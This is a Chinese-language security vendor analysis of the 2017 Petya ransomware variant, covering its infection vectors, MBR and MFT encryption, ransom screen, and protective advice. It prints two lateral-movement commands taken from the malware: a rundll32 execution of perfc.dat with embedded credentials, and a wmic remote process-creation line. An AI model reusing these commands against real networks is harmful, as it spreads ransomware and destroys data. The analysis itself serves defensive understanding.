Petya新變種簡介
據twitter爆料,烏克蘭政府機構遭大規模攻擊,其中烏克蘭副總理的電腦均遭受攻擊,目前騰訊電腦管家已經確認該病毒為Petya勒索病毒變種。Petya勒索病毒變種中毒后會掃描內網的機器,通過永恒之藍漏洞自傳播到內網的機器,達到快速傳播的目的。有國外安全研究人員認為,Petya勒索病毒變種會通過郵箱附件傳播,利用攜帶漏洞的DOC文檔進行攻擊。中毒后,病毒會修改系統的MBR引導扇區,當電腦重啟時,病毒代碼會在Windows操作系統之前接管電腦,執行加密等惡意操作。電腦重啟后,會顯示一個偽裝的界面,此界面實際上是病毒顯示的,界面上假稱正在進行磁盤掃描,實際上正在對磁盤數據進行加密操作。
當加密完成后,病毒要求受害者支付價值300美元的比特幣之后,才會回復解密密鑰。
傳播渠道分析可能傳播渠道-郵箱傳播
根據烏克蘭CERT官方消息,郵件附件被認為該次病毒攻擊的傳播源頭,郵箱附件是一個DOC文檔,文檔通過漏洞CVE-2017-0199來觸發攻擊,電腦管家也溯源到了國內類似郵件攻擊最早發生在6月27日早上。在實際測試過程中,并沒有完整重現整個攻擊過程。
可能傳播渠道-MeDoc
很多安全研究機構認為,這次Petya的攻擊源是由于MeDoc軟件的更新服務被劫持導致。
詳細功能分析感染過程分析
1,寫MBR
0~0x21扇區保存的是病毒的MBR和微內核代碼數據,而原始的MBR被加密保存在第0x22扇區。
2,加密文件
1)遍歷分區
2)要加密的文件類型
3)文件加密過程
3、傳播方式
1)可能通過管理共享在局域網內傳播,而后通過wmic來實現遠程命令執行。
C:\Windows\dllhost.dat \\10.141.2.26 -accepteula -s -d C:\Windows\System32\rundll32.exe "C:\Windows\perfc.dat",##1 60 "RCAD\ryngarus.ext:FimMe21Pass!roy4""RCAD\svcomactions:3GfmGeif"
c:\windows\system32\wbem\wmic.exe /node:"IP_ADDR" /user:"User" /password:"PWD" process call create "c:\windows\system32\rundll32.exe" \"c:\windows\perfc.dat\" #1
2)通過EternalBlue和EternalRomance漏洞傳播。
程序發動攻擊前,先嘗試獲取到可攻擊的IP地址列表:
依次獲取:已建立TCP連接的IP、本地ARP緩存的IP以及局域網內存在的服務器IP地址。收集完這些地址后,便進行進一步攻擊。
磁盤加密和勒索細節
主要功能描述:
1、系統重啟,惡意MBR加載;
2、檢測磁盤是否被加密,如果沒有則顯示偽造的檢測磁盤界面、并加密MFT;
3、顯示紅色的勒索界面,讓用戶輸入秘鑰;
細節分析:
MBR啟動后,將1-21扇區數據復制到8000地址處,然后Jmp執行8000地址代碼
通過讀取標記位判斷磁盤已經被加密
若磁盤沒有加密,則顯示偽造的檢測磁盤界面,并加密MFT
加密完成后,讀取扇區后面的勒索語句
將獲取到的語句顯示到屏幕上
從屏幕獲取秘鑰并驗證
安全建議
1, 及時下載安裝騰訊電腦管家,并使用勒索病毒免疫工具,防患于未然。(免疫工具下載地址http://dlied6.qq.com/invc/xfspeed/qqpcmgr/download/PetyaFix_2_0_766_127.exe)
2, 及時使用電腦管家將補丁打全。
3, 遇到可疑文件,特別是陌生郵件中的附件,不要輕易打開,首先使用電腦管家進行掃描,或上傳至哈勃分析系統(https://habo.qq.com/)對文件進行安全性檢測。
| 
